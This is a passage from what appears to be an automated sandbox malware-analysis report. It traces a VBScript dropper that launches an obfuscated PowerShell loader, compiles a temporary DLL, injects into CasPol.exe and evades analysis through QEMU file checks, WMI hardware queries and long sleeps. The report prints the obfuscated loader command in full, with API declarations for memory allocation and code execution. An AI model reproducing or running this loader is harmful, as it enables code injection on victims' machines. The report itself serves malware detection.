SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0287B5B0 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07BE7581 push es; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C48FC1 push ds; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4C7A0 push DC07C33Fh; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F718 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E719 push ebx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F71B pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F6C1 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F687 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E6B8 push ebx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E6BB push ebx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F648 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F5F1 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F5B1 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F5B3 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F570 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F573 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E510 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F530 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F533 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E4D0 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E4D3 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E4F0 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E4F3 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4F491 pushad ; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E451 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E453 push edx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C48468 push ss; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C48348 push ss; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E333 push ecx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07C4E299 push ecx; ret
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dllJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: Initial fileInitial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7892Thread sleep count: 666 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7892Thread sleep time: -333000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dllJump to dropped file
